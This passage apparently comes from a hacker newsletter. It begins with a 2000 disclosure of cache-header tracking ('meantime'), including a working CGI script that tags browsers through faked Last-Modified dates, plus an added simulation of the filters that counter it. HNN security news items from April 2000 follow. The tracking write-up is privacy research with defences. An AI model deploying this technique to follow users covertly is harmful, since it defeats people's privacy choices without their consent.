Last-Modified is constrained to be a date, and therefore is somewhat inflexible. Nevertheless, the server can reasonably choose any second since the Unix epoch, which allows it to tag on the order of one billion distinct clients. ETag allows an arbitrary short string to be stored and passed. It is not so commonly implemented in user agents at the moment, and so not such a good choice.

In both cases the tag will be lost if the client discards the resource from its cache, or if it does not request the exact same resource in the future, or if the request is unconditional. (For example, Netscape sends an unconditional request when the user presses Shift+Reload.) Bob has less control over this than he has with cookies, which can be instructed to persist for an arbitrarily long period.
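The tag round trip described above, and the two client-side responses the paper discusses later under implications (stripping the conditional headers altogether, or rounding the date to the minute and clipping it to a year), as an added in-memory simulation that is not part of the paper or of its demonstration script. The TaggingServer, CachingClient, the two filter functions and the fixed NOW date are all constructed for this example; no network traffic is involved. The "recent" tag scheme goes slightly beyond the paper's epoch-seconds demo to show the "several bits remain under Bob's control" remark concretely.

```python
"""Constructed simulation of the meantime tag round trip and of two
proxy-side filters; everything below runs in memory, no sockets."""
from datetime import datetime, timedelta, timezone
from email.utils import formatdate, parsedate_to_datetime

# Fixed "current time" so the scenario is repeatable (constructed value).
NOW = datetime(2000, 3, 29, 5, 47, 3, tzinfo=timezone.utc)
ONE_YEAR = timedelta(days=365)


class TaggingServer:
    """Hypothetical stand-in for Bob's tag-issuing script (not the paper's).
    scheme "epoch":  tags are seconds since the Unix epoch (1, 2, 3, ...).
    scheme "recent": tags are whole minutes inside the last year, which a
    client that only rounds and clips the date echoes back unchanged."""

    def __init__(self, scheme="epoch"):
        self.scheme = scheme
        self.issued = 0
        self.chains = {}          # tag string -> requests seen carrying it

    def _new_tag(self):
        self.issued += 1
        if self.scheme == "epoch":
            stamp = self.issued
        else:
            base = NOW.replace(second=0, microsecond=0)
            stamp = (base - timedelta(minutes=self.issued)).timestamp()
        return formatdate(stamp, usegmt=True)

    def handle(self, request_headers):
        """Answer one request: recognise an echoed tag or issue a new one."""
        ims = request_headers.get("If-Modified-Since")
        if ims:
            ims = ims.split(";")[0].strip()    # drop ";length=..." extras
        if ims in self.chains:
            self.chains[ims] += 1
            tag = ims
        else:
            tag = self._new_tag()
            self.chains[tag] = 1
        return {"Last-Modified": tag,
                "Cache-Control": "private, must-revalidate"}

    def longest_chain(self):
        return max(self.chains.values())


class CachingClient:
    """Browser-like cache: remembers Last-Modified per URL and echoes it as
    If-Modified-Since on the next conditional request for that URL."""

    def __init__(self):
        self.cache = {}

    def fetch(self, server, url, request_filter=None):
        headers = {}
        if url in self.cache:
            headers["If-Modified-Since"] = self.cache[url]
        if request_filter is not None:        # the local anonymising proxy
            headers = request_filter(headers)
        response = server.handle(headers)
        self.cache[url] = response["Last-Modified"]
        return response


def strip_conditional_headers(headers):
    """Strong rule: send no cache validators at all (costs bandwidth)."""
    return {k: v for k, v in headers.items()
            if k not in ("If-Modified-Since", "If-None-Match")}


def round_and_clip(headers, now=NOW):
    """Weaker rule: keep If-Modified-Since but round it down to the minute
    and clip it to no more than one year before now; drop If-None-Match."""
    out = {k: v for k, v in headers.items() if k != "If-None-Match"}
    ims = out.get("If-Modified-Since")
    if ims is None:
        return out
    try:
        when = parsedate_to_datetime(ims.split(";")[0].strip())
    except (TypeError, ValueError):
        del out["If-Modified-Since"]          # unparseable: safer to drop
        return out
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    when = when.replace(second=0, microsecond=0)
    floor = (now - ONE_YEAR).replace(second=0, microsecond=0)
    if when < floor:
        when = floor
    out["If-Modified-Since"] = formatdate(when.timestamp(), usegmt=True)
    return out


def simulate(scheme, request_filter=None, clients=2, visits=3):
    """Run several clients against one server and return the longest chain
    of requests the server could tie to a single tag."""
    server = TaggingServer(scheme)
    for _ in range(clients):
        client = CachingClient()
        for _ in range(visits):
            client.fetch(server, "/pixel.gif", request_filter)
    return server.longest_chain()


if __name__ == "__main__":
    for scheme in ("epoch", "recent"):
        for name, flt in (("no filter", None), ("round+clip", round_and_clip),
                          ("strip", strip_conditional_headers)):
            print("%-6s %-10s longest chain = %d"
                  % (scheme, name, simulate(scheme, flt)))
```

Without a filter every client's three visits form one chain of length 3. Rounding and clipping breaks the chain only for the epoch-seconds server, because its 1970 dates all collapse to the one-year floor; a server that hands out minute-aligned dates from the last year is unaffected. Stripping the validators defeats both schemes, at the cost of a full transfer on every visit, which is the trade-off the paper describes.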
The date is only sent back for the exact same URL, including any query parameters. By contrast, cookies can be returned for all resources in a site or section of a site. This makes Bob's job a little harder. Bob therefore should make sure that all pages link to a small common resource: perhaps a one-pixel image. This image is generated by a script that supplies and records a unique timestamp to each client, and records whatever is already present.

intermediate proxies

The presence of proxy caches between the client and the server will complicate the situation for Bob, because if the proxy holds a copy of the resource it might satisfy the request locally or change the cache control criteria. In the extreme case, if the proxy does all the caching and the client none, then Bob will identify all requests through that proxy as a single chain.

Bob need not despair. Proxy usage is still quite low, and there are some indications that people concerned about anonymity will not route their requests through a proxy that might log them.

In fact, a meantime exploit is entirely possible if Bob controls an intermediate proxy. This seems not to be so much of a threat in practice, however, because proxies are most commonly controlled by the administrators of a local network who already have considerable power to trace users.

If intermediate proxies or clients implement expiry heuristics then this can interfere with tracking, but not irredeemably so.

demonstration

This very simple demonstration places a tag in your browser's cache, and allows you to associate a short string with it on our server. It should persist as long as the record remains in your browser's cache. If there are several caches on your system, perhaps for different use profiles, or for different user agents, then each will get one tag. It will not be confused by other people accessing the system from the same machine, by use of different IP addresses, or by cookies being disabled.
The demonstration will be easier to understand if your browser is set to `Cache is compared to network on every request'. If that setting is not checked, your access will still be tracked but the fields of the page may not seem to update. This will not work in Lynx.

(links on the original page: track me, source code, results)

This code is a demonstration of the principle, rather than a full implementation of tracking. Nevertheless:

    It works quite reliably against Netscape.
    Lynx apparently never sends conditional requests, and so is safe.
    Junkbuster does not prevent tracking.
    anonymizer.com seems to keep a cache on their servers and rewrites the page as it passes through, so it seems to be safe: all anonymizer.com users appear as one.

implications

Anonymizing software should probably strip out all cache headers. Unfortunately this will slow down access and waste network bandwidth, but it seems necessary that the client should not return any information to the server if it is to preserve anonymity.

Possibly Alice should ask her client to never refresh cached requests unless explicitly requested: this will maintain performance for the common case of unchanged pages. When the page must be refreshed, she should be careful that no information about the previously cached copy is emitted.

If all of Alice's requests were directed through an anonymizing proxy crowd it would be harder to associate the tagged requests with her other activities, but not infeasible.

Clients could try to manipulate the modification times to give Bob less room to move: for example, they could round off the time to the lowest minute, and could clip times to be no more than a year from the current date. But this still leaves several bits of the value under Bob's control: even separating users into equivalence classes based on where they first accessed this site might be interesting, for example.

Designers of future protocols should consider similar tagging security issues.
For example, although ETags handle cache consistency problems better than Last-Modified headers, they make tracking even easier by allowing the server to store arbitrary data on the client.

references

There was some discussion of problems with Last-Modified on the HTTP Working Group mailing list, but it seems they didn't identify the privacy problems.

revision history

2000-03-28  Cleared up the explanation.
2000-03-29  Further revise the text after feedback from OzLabs hackers. Add Cache-Control headers to the demo to try to be more in the style of HTTP/1.1. Add a form through which users can record a string associated with their cache. Also keep track of how many times they have visited the page. Test against anonymizer.com and junkbuster.

The code:

#! /usr/bin/python

# $Id: meantime.py,v 1.3 2000/03/29 05:47:03 mbp Exp $

# Copyright (C) 2000 by Martin Pool.

# This software is provided 'as-is', without any express or implied
# warranty.  In no event will the authors be held liable for any damages
# arising from the use of this software.

# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:

# 1. The origin of this software must not be misrepresented; you must not
#    claim that you wrote the original software. If you use this software
#    in a product, an acknowledgment in the product documentation would be
#    appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
#    misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
# Written for Python 1.5-era CGI: gdbm, string.find, has_key and backtick
# repr are all period idioms.  Runs as an nph-style CGI script, so it
# emits the status line itself.

import cgi
from os import environ
import gdbm
from sys import stdout, stderr
from time import gmtime, asctime, ctime, time
from string import find

def nice_get(dict, key):
    # dictionary lookup that returns None instead of raising KeyError
    if dict.has_key(key):
        return dict[key]
    else:
        return None

def log(str):
    # stderr ends up in the web server's error log
    stderr.write(str + '\n')

form = cgi.FieldStorage()
datafile = gdbm.open('mtdata', 'c')

method = nice_get(environ, 'REQUEST_METHOD')
if method == 'POST':
    # the form lets the visitor attach a string to their existing tag
    ims = form['tag'].value
    newvalue = form['newvalue'].value
    datafile[ims] = newvalue
    value = newvalue
    log('updated key %s to %s' % (ims, value))
else:
    # method == 'GET' i hope
    ims = nice_get(environ, 'HTTP_IF_MODIFIED_SINCE')
    if ims:
        # the browser echoed back the fake Last-Modified we gave it earlier
        log('got ims "%s"' % ims)
        # there might be extra parameters after the date such as the
        # length, but we ignore them
        pos = find(ims, ';')
        if pos > 0:
            ims = ims[:pos]
        value = nice_get(datafile, ims)
        log('retrieved value %s for key %s' % (`value`, `ims`))
    else:
        # first visit (or unconditional request): mint a fresh tag by
        # handing out the next second since the epoch as a date
        next = int(nice_get(datafile, 'Next') or 0)
        next = next + 1
        datafile['Next'] = str(next)
        ims = asctime(gmtime(next))
        log('Generated new fake time %s' % ims)
        value = None

if value is None:
    value = '%s:%s %s' % \
            (nice_get(environ, 'REMOTE_ADDR') or 'Unknown',
             nice_get(environ, 'REMOTE_PORT') or 'Unknown',
             asctime(gmtime(time())))
    datafile[ims] = value
    log('remembering value "%s" for key "%s"' % (value, ims))

# per-tag visit counter
count_key = ims + ';count'
count = nice_get(datafile, count_key)
if count is None:
    count = 1
else:
    count = int(count) + 1
datafile[count_key] = `count`

datafile.close()

stdout.write("HTTP/1.1 200 OK\r\n");
stdout.write("Content-Type: text/html\r\n");
stdout.write("Last-Modified: " + ims + "\r\n");
stdout.write("Cache-Control: private\r\n");
stdout.write("Cache-Control: must-revalidate\r\n");
stdout.write("\r\n");
# The original HTML body was lost in extraction; this minimal page stands
# in for it, consuming the three values in the order the original passed.
stdout.write("""<html><body>
<p>You have loaded this page %s time(s) with the current cache record.</p>
<form method="POST">
<input type="hidden" name="tag" value="%s">
<p>Recorded value for your tag: %s</p>
<p>New value: <input type="text" name="newvalue"> <input type="submit"></p>
</form>
</body></html>
""" % (count, ims, value))
cgi.print_environ()

@HWA

165.0 HNN:Apr 3rd:Identity Theft On the Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by royb
Identity theft is on the rise; while not a new crime, law enforcement
officials credit the Internet with its rising popularity. (Glad to see the NY Times using words other than hacker to equate criminal.)

NY Times
http://www.nytimes.com/library/tech/00/04/biztech/articles/03theft.html

(no article - pay site leeches - Ed)

----------

@HWA

166.0 HNN:Apr 3rd:Computer Crime Laws
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
An interesting site that lists the computer crime statutes for most of the 50 states and several countries.

Lady Sharrow
http://www.ladysharrow.com/Library/LAWS/

----------

@HWA

167.0 HNN:Apr 4th:Computers Turned Into Bombs Via The Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Sean
Arnold Yabenson, president of the Washington-based consumer group National CyberCrime Prevention Foundation (NCPF) claims that a purposely written email attachment can have the potential to change the electrical current and molecular structure of the central processing unit causing a violent explosion. (There is no date on this but this has to be an old April Fools joke.)

Weekly World News
http://www.weeklyworldnews.com/stories/1450.html

----------

(yeah you guessed it its a 404, probably not missing much either heh - Ed)

@HWA

168.0 HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Glassbook, publisher of Stephen King's 66-page novella that was released for sale on-line, announced prior knowledge of security vulnerabilities in the applications used to read the book. Use of these insecure applications enabled piracy of the book.

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,16009,00.html

----------

Hacking the Bullet

The rush to release Stephen King's e-book compromised piracy safeguards.

by Christine McGeever, Computerworld
April 3, 2000, 9:09 a.m.
PT

Now that pirated versions of the popular 66-page electronic novella by Stephen King, "Riding the Bullet," have surfaced, the electronic book's distributor, Glassbook, will release a more secure version of its e-book reader.

Glassbook President Len Kawall says that the updated version will be available next week, equipped with security features that should have been present for the King book release. But in the hurry to get the book out to market, a less robust reader was used. As a result, Kawall says, someone "chiseled in" to the content of the book after downloading and opening it in the reader. He adds that encryption technology used to transmit the book securely on the Internet was not compromised.

However, the version of the book reader used with King's novella was vulnerable from the start, and both Glassbook and "Riding the Bullet" publisher Simon & Schuster knew it. Kawall says that Glassbook wanted to distribute the book with a reader that had 64-bit encryption, but couldn't make the publisher's deadline with the updated reader.

In addition, the specification used to secure the book in transmission hasn't yet been formalized by the standards group behind it, the Book Industry Study Group. The Electronic Book Exchange specification hasn't been presented in a finished draft, nor has it been presented in any manner for industry review, according to BISG spokesperson Sandra Paul. The BISG was formally announced on March 28, two weeks after the King book was released.

Kawall adds that "Simon & Schuster absolutely understands" how a security breach could occur and that the industry "has learned to live with piracy." He cites the 400,000 to 500,000 legitimate copies of the book in distribution compared to what he estimates to be "a few" pirated copies. Adds Kawall, "It is not the end of e-books. Our job is to make it more pleasurable to purchase the product from a legitimate source."
Meantime, Glassbook has announced the new reader and posted on its Web site "aggressive steps" it plans to take "to stem e-book piracy." The steps outlined include forming a full-time antipiracy support team that will search the Internet for pirated material, work with the publisher to remove illegally published material, and cooperate with the FBI and international authorities to monitor, track, and report suspected digital piracy and copyright infringement.

@HWA

169.0 HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Eric
Brian Michael Jacobs, 23, of Mobile, Alabama was arraigned by U.S. Magistrate Bert W. Milling Jr. last Wednesday. He has been charged with knowingly transmitting "code and commands to the computer of an Internet Service Provider (ISP)" which resulted in more than $5,000 in damage. He faces a potential sentence of up to five years in federal prison and $250,000 in fines.

Alabama Live
http://www.al.com/news/mobile/Mar2000/28-a344051a.html

----------

Man faces charges of computer hacking

03/28/2000
By CHRISTINE HAUGHNEY
Register Staff Reporter

A former Eagle Scout and son of a former Mobile philanthropist faces federal charges for alleged computer hacking.

Brian Michael Jacobs, 23, of Mobile was arraigned by U.S. Magistrate Bert W. Milling Jr. last Wednesday on charges that on May 16, 1999, he "knowingly transmitted code and commands to the computer of an Internet Service Provider (ISP)" which resulted in more than $5,000 in damage. The combined charges carry up to five years in federal prison and $250,000 in fines.

In the computer world, Jacobs assumed the code name Blaxthos, court documents state.

A 1995 Murphy High School graduate and Eagle Scout, Jacobs briefly attended Auburn University before leaving in March 1996. Jacobs was convicted on state charges in Lee County in 1996.
But Ronald Myers, the former prosecutor on the case, said that he could not comment further on the charges because Jacobs was a youthful offender at the time.

His father, Michael Jacobs, who had worked as executive director of the Medical Society of Mobile County Inc., died in 1997.

Court documents list Jacobs as a "permanent" resident of Miami, Fla., where he is working. But a Mobile address also was listed in court documents.

Milling, however, released him with the requirements that he "refrain from any use or unlawful possession of a narcotic drug and other controlled substances" and that he "undergo random urinalysis; also drug and alcohol treatment as deemed appropriate."

At Wednesday's hearing, Jacobs' attorney, Arthur Madden, mentioned a dispute with the U.S. attorney's office about failing to provide documents it had against Jacobs. "The government has had eight months to get ready to do this," Madden told Milling.

The court scheduled Jacobs' case for May.

© 2000 Mobile Register. Used with permission.

@HWA

170.0 HNN:Apr 4th:Federal Web Site Security Called Weak (Again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Members of the House cyber security team told lawmakers (again) on Monday that government web sites have weak security. An additional $250 million was requested to fund cyber security pilot programs at five agencies. A request was also made to exempt cooperating companies from the Freedom of Information Act when sharing proprietary information with the government following a cyber attack. (Freedom from FOIA will make absolutely no difference and will further erode the peoples' rights.)
Government Executive Magazine
http://www.govexec.com/dailyfed/0400/040400b1.htm

----------

April 4, 2000

DAILY BRIEFING

Federal Web site security called weak

By Juliana Gruenwald, National Journal's Technology Daily

While many of the government's computer systems are secure, federal agencies' Web interfaces with the public are the weakest links, two security experts told lawmakers Monday.

Members of the House cybersecurity team and other lawmakers toured computer security firms in Northern Virginia Monday, including online security firm Global Integrity. Company President Dan Wooley and William Marlow, the company's executive vice president, also cited the need to provide companies with some exemption from the Freedom of Information Act to ensure that proprietary information that they share with the government about a cyberattack is not revealed. Reps. Tom Davis, R-Va., and James Moran, D-Va., are expected soon to introduce a bill addressing that issue.

In the area of computer security, House cyber team leader J.C. Watts, R-Okla., chairman of the House Republican Conference, and four other House members sent a letter Friday to Rep. Harold Rogers, R-Ky., chairman of the House Appropriations Commerce, Justice and State Subcommittee, requesting that $250 million be appropriated to fund an information security pilot program at five agencies. The agencies include the Defense and State Departments and the Environmental Protection Agency, which has been criticized for its information security practices.

"Governmentwide policies for the management of programs that support the cost-effective security of federal information systems remain inadequate," Watts wrote along with Davis and Reps. Pete Sessions, R-Texas, James Rogan, R-Calif., and Bill McCollum, R-Fla.

Rep. Bob Goodlatte, R-Va., said he would like to see the Clinton administration hold an international summit on cybersecurity.
If the administration fails to act, he suggested that Congress may have to pass a resolution urging the president to take such an action. "There's a great need for greater international cooperation" on the issue, Goodlatte said.

On the tour, Wooley said denial of service attacks and damage to a company's reputation were the biggest potential losses for companies when they are attacked. An employee showed a group of lawmakers how a hacker might break into a bank Web site and potentially steal money from an account.

@HWA

171.0 HNN:Apr 4th:Germans Propose Strike Force For Net Defense
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by acopalyse
A secret committee of the German government has released a study it has been working on for two years. The study concluded that Internet attacks will replace ground wars in the coming years. The group, which included several government groups, warned that attacks could be targeted against military or civilian computer systems. The group also proposed a 'strike force' to help defend critical sites. (How does a 'strike force' defend anything?)

ZD Net
http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2504525,00.html?chkpt

----------

Germany eyes Web security

After almost two years of study, a secret committee of the German government has concluded that Internet attacks will supplant military conflicts in the coming years, according to German magazine "Der Spiegel." The group, which encompasses several ministries, security forces and the chancellorship, warned that attacks could interfere with sites belonging to the military as well as key civil institutions such as the police, power utilities and health services. "There is no more national territory" that can be defended militarily, the group reports; it went on to propose a "strike force" within the German federal office for security that could address attacks on critical sites.
-- Susanne Rieger, ZDNet Germany; translation by Matthew Rothenberg, ZDNet News

@HWA

172.0 HNN:Apr 4th:New Mags are Now Available.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by chri
Issue 10 of Krash has been released. Rogue Transmission issue #3 is now available.

Krash
http://www.krash.org.uk
Rogue Transmission
http://www.geocities.com/solidex

----------

@HWA

173.0 HNN:Apr 5th:De Beers Releases Personal Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles
adiamondisforever.com recently released the names, addresses, phone numbers and e-mail of over 35,000 customers. The web site, sponsored by De Beer's, is part of The Diamond Information Center (DIC). Site administrators quickly fixed the hole that allowed the information to be accessible.

C|Net
http://news.cnet.com/news/0-1007-200-1639327.html?tag

----------

@HWA

174.0 HNN:Apr 5th:CFP In Toronto
~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The Tenth Computers Freedom and Privacy conference got underway yesterday in Toronto, Canada. Anonymity on the Internet is one of this year's hottest topics.

The Computers Freedom and Privacy Conference
http://www.cfp2000.org/
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,16043,00.html

----------

Can Net Infrastructure Protect Privacy?

Privacy conference panelists debate control implications of domain name system.

by Rebecca Sykes, IDG News Service
April 4, 2000, 3:45 p.m. PT

As the world grapples with how and whether to control the Internet, a model surfaced at the Computers, Freedom, and Privacy conference held in Toronto this week to let control--and individuals' civil liberties--flow not from legislation but from the Net's infrastructure itself.

"We're trying to use technology to build a civil-liberties infrastructure," says Lenny Foner of the Media Lab at Massachusetts Institute of Technology.
One sticky Internet issue with control implications is the domain name system, which provides the human-friendly monikers such as "Amazon.com" and their corresponding numerical Internet Protocol addresses. "Whoever gets to decide who receives the names gets to decide, in a sense, how visible" people and companies are on the Internet, MIT's Foner says.

Currently the company most associated with the domain name system, Network Solutions, manages top-level domain servers, including .com, .net, and .org, under a four-year contract awarded last November by the U.S. Department of Commerce. The Herndon, Virginia-based Network Solutions is not the sole naming player in the system, but the vendor's clout is evident from the $21 billion stock deal that VeriSign worked out last month to acquire Network Solutions.

Thwarting the Squatters

Panelists contemplated how to confound that near-centralized control of the Net while retaining its operational value. One possibility would be to permit multiple names, Foner says. Such a move would cut into the power of an organization to grant the name and would also thwart "land grabs," where squatters purchase all possible permutations of a company's name, Foner adds.

An initial search for a specific company's Web site using the current convention, for example, "ibm.com," might list multiple, dramatically different sites. However, once the IBM site was reached, its location could be cached on the user's computer, so that a second query on "IBM" would quickly bring the user to that same site, according to Foner.

But one panelist was concerned that relying on caches was not in keeping with the way people use computers. Increasingly, users access the Internet from many sources, not from just their home or work PC, says Lance Cottrell of Anonymizer.com. "People will have an expectation that, if they've always typed in one name to get to a place," they will always be able to use that name, Cottrell says.
Another panelist said that a system in which names were not unique would never pass muster with powerful electronic commerce players. "They're going to hate the idea that a user could type in 'AT&T' or 'British Telecom'" and not get to those corporate sites, says Jonathan Weinberg of Wayne State University. "Major e-commerce players are not going to use this."

Important e-commerce companies are not the only ones who value having unique and easily reachable names, according to Phil Zimmermann, the creator of the encryption software Pretty Good Privacy. "I would like to be able to know that if I type in 'barnesandnoble.com' that I get Barnes and Noble," Zimmermann says.

@HWA

175.0 HNN:Apr 5th:Enigma Machine Stolen From Museum
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The Abwehr Enigma G-312 was stolen from its resting place in a glass display case at Bletchley Park Trust on April 1st. This specific variant of the machine is said to be one of only two known to exist. Cryptographers around the world are hoping that this is some sort of cruel April Fools joke and that the machine will soon be returned.

Updated Information on the Stolen Machine
http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html
Wired
http://www.wired.com/news/politics/0,1283,35409,00.html

----------

Go to the first url for neat pics and technical data on the enigma - Ed

Wired;

Cryptos Try to Solve Enigma Crime
by Lynn Burke
3:00 a.m. Apr. 5, 2000 PDT

Whoever stole the rare, World War II secret decoder known as the Abwehr Enigma is going to have a tough time selling it on the online black market.

That's what cryptology enthusiasts are saying after the famous decoding machine used during the war to protect German secret messages was taken from its home in a glass display case at Bletchley Park Trust in London on April 1.
"We hope that if the Internet community gets behind it, it will be impossible to sell the machine on the public market," said Christine Large, the trust's director.

Because the machine was stolen on April Fool's day, trust officials say its theft may have been a prank. "If it was just an April Fool, we hope our Abwehr Enigma turns up soon," Large said.

But as long as the decoder remains at large, active cryptologists who revere the analog antique are getting the word of its disappearance out over the Web, hoping to catch a thief who might try and sell the item online.

Leading the effort is the Crypto Simulation Group, a small group of cryptologists who specialize in the Enigma machines.

"In addition to our normal activities in cryptologic research, we have set up Web pages ... to broadcast to as large a base as possible the features of this rather unique piece of historical cipher equipment in the hope that the thieves will be caught in the act of attempting to dispose of it," said David Hamer, one of the group's members.

Hamer, a retired historian living in New Jersey and one of the world's foremost Enigma experts, said it's important to rescue the machine because it is one of only two of its kind known to still exist. The other one is housed in the National Cryptologic Museum at Fort Meade, Maryland.

According to a spokesman at the museum, 200 "G" Enigmas were issued to the German army high command during World War II for an unknown "special purpose." But no one seems to know where most of those have ended up, making the stolen machine all the more valuable.

"This Abwehr Enigma is a close to unique variant," and it's likely to be worth quite a sum of cash, Hamer said. "Even standard service Enigmas are rare enough to command prices in the tens of thousands of dollars," he said.

Since the announcement of the theft, several sites dedicated to cryptology have added a link to this urgent message about the machine's theft.
Message boards have been frenetic with hundreds of postings about the machine's theft.

The decoder, which looks like little more than an old-fashioned typewriter with a counter above the keyboard that resembles a car odometer, was given to the museum in 1998 by Britain's intelligence agency, the Government Communications Headquarters.

According to the U.S. National Security Agency, cryptology was key to the success of the Allies in World War II.

"Information from decrypted Enigma messages (not necessarily the Abwehr) was used time after time to outmaneuver German forces," said NSA spokeswoman Judi Emmel. "Losing this Enigma is a significant loss to the historic record of World War II cryptology."

@HWA

176.0 HNN:Apr 5th:Thailand Police Form Cyber Crime Panel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
A Committee for the Suppression of Computer Crimes has been formed by the Police Information System Centre to fight crimes involving technology, including those committed on the Internet. Besides Police officers the committee also has members from local ISPs, the National Electronics and Computer Technology Centre (Nectec), security professionals and the Telephone Organization of Thailand.

News Bytes
http://www.newsbytes.com/pubNews/00/146912.html

----------

The page or story you have requested is available to subscribers only!

(Eat me. - Ed)

@HWA

177.0 HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
An official Chinese government survey quoted by China Daily revealed that 40 percent of Chinese web sites have suffered online attacks. The State Council Development Research Center conducted a survey of 300 Internet firms. 44 percent said that some of the information has been tampered with and 40 percent claimed to have suffered an online malicious attack.
Agence France Presse - via Inside China Today
http://www.insidechina.com/news.php3?id

----------

(I dunno, I couldn't find the story among that mess you try looking for it ... -Ed :-/ )

@HWA

178.0 HNN:Apr 6th:DoubleClick Wins Privacy Award
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The Computers, Freedom, and Privacy conference being held this week in Toronto, Canada has awarded DoubleClick the prestigious corporate invader award. Other winners included Commerce Secretary William Daley who won the award for worst government official and credit reporting firm Transunion received the lifetime menace award.

Computers, Freedom, and Privacy conference
http://www.cfp2000.org
Wired
http://www.wired.com/news/politics/0,1283,35432,00.html

----------

DoubleClick Wins for Losing
by Declan McCullagh
3:00 a.m. Apr. 6, 2000 PDT

TORONTO -- Say what you will about liberal privacy advocates, but they sure do know how to have a good time.

Four of them dressed up as malicious characters from the Star Wars and Austin Powers movies to hand the second annual "Big Brother" awards to miscreant government agencies and large corporations on Wednesday evening.

The bald director of Privacy International, Simon Davies, was a near-perfect Dr. Evil and master of ceremonies during the Computers, Freedom, and Privacy conference.

The winner of the corporate invader award: DoubleClick, a company whose now-legendary privacy missteps drew fire earlier this year.

Commerce Secretary William Daley won the worst government official award, beating out the Federal Trade Commission. The Commerce Department has hosted direct marketing conferences and oversees U.S. export controls of encryption technology.

"We had a very tough time determining who would have the lifetime achievement menace award," said Dave Banisar, a fellow at the Electronic Privacy Information Center. "To truly be a lifetime menace, you can't just be a flash in the pan.
DoubleClick has only been around for a few years."

An anonymous CFP conference-goer costumed as Star Wars' Darth Vader accepted the award on behalf of credit reporting firm Transunion to applause from the roughly 150-person audience.

Oddly enough, Transunion beat out the National Security Agency, which championed the government-backdoored Clipper chip in the early 1990s and spent decades trying to stifle academic encryption research in the United States.

Winners of the pro-privacy Brandeis Award, named after U.S. Supreme Court Justice Louis Brandeis, included Beth Givens of the Privacy Rights Clearinghouse, and Richard Smith, who regularly exposes privacy violations in consumer software products.

Previous Big Brother winners have included Microsoft and the FBI. The CFP conference continues through Friday.

@HWA

179.0 HNN:Apr 6th:ACLU Appeals CPHack Ruling
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
Last week's ruling concerning CPHack by U.S. District Judge Edward Harrington was extremely vague and is now being appealed by the ACLU. CPHack revealed the list of web sites blocked by Cyber Patrol as well as allowing people to circumvent its blocking capabilities. The court's decision prevented people from linking to the software; the ACLU is charging that the US does not have the power to regulate the global internet.

Copy of Judge's Order
http://www.politechbot.com/cyberpatrol/final-injunction.html
Wired
http://www.wired.com/news/business/0,1367,35464,00.html

----------

@HWA

180.0 HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Macki
The Motion Picture Association of America has now filed an injunction telling 2600 magazine what they can and cannot link to via their web site. Primarily they are no longer allowed to link to sites that host copies of DeCSS.
2600.com
http://www.2600.com/news/2000/0406.html
Wired
http://www.wired.com/news/politics/0,1283,35394,00.html

----------

@HWA

181.0 HNN:Apr 6th:Enigma Suspect Busted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by whitevampire
Police have arrested and released on bail an unidentified Englishman for the theft of the Abwehr Enigma machine. The machine was recently stolen from the museum at Bletchley Park Trust. It has been valued at $150,000 but to many it is priceless. Police are still searching for the machine itself.

More information on the Machine
http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html
Wired
http://wired.com/news/politics/0,1283,35433,00.html
Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000405/od/machine_1.html

----------

@HWA

182.0 HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by darkscent
